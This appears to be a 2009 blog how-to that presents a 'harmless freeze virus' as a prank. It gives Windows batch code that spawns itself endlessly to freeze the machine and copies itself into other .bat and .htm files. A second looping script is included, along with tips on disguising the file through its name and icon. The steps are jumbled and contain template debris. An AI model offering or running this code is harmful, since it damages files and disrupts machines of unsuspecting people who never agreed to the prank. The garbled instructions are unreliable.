,

Create a Harmless Freeze Virus

Monday, July 6, 2009 Leave a Comment

Steps

  1. Open Notepad or other word processor.
  2. Type on the first line, "start virus.bat," then, on the next #type the following code:
    • @echo off
    • for %%f in (*.bat) do copy virus.bat+%%f
  3. if not exist c:\fr.htm echo {{{1}}}>c:\fr.htm
    • start virus.bat
    • for %%f in (*.htm) do copy c:\fr.htm+%%fSave the file as "virus.bat" and select all files. You can change "virus" to anything you want.
  4. Open the file and it will open so many pointless windows, your computer will freeze.
  5. Shut down your computer and it will return to normal.
  6. Beware of angry friends
  7. Or try this one
  8. Open Notepad or other word processor.
  9. Type this in
    BEGIN

  10. REM Endless loop, Help!!

  11. GOTO BEGIN

  12. Then save as loop.bat

  13. Then when you open it it will keep looping Help!! and probly lag or crash a computer.

  14. If you want to stop it hit X.

Tips
  • To change the icon of ANY short cut right click on it and select properties. Next click change icon. It might give you a error but ignore it and continue. Then select the one you want and press okay/apply.
  • This could be a fun practical joke.
  • You can change the filename from virus to anything you want, just as long as you change every part of the file where it says virus to your new name.
  • When changing the name, be sure to keep the .bat part

0 comments »

Leave your response!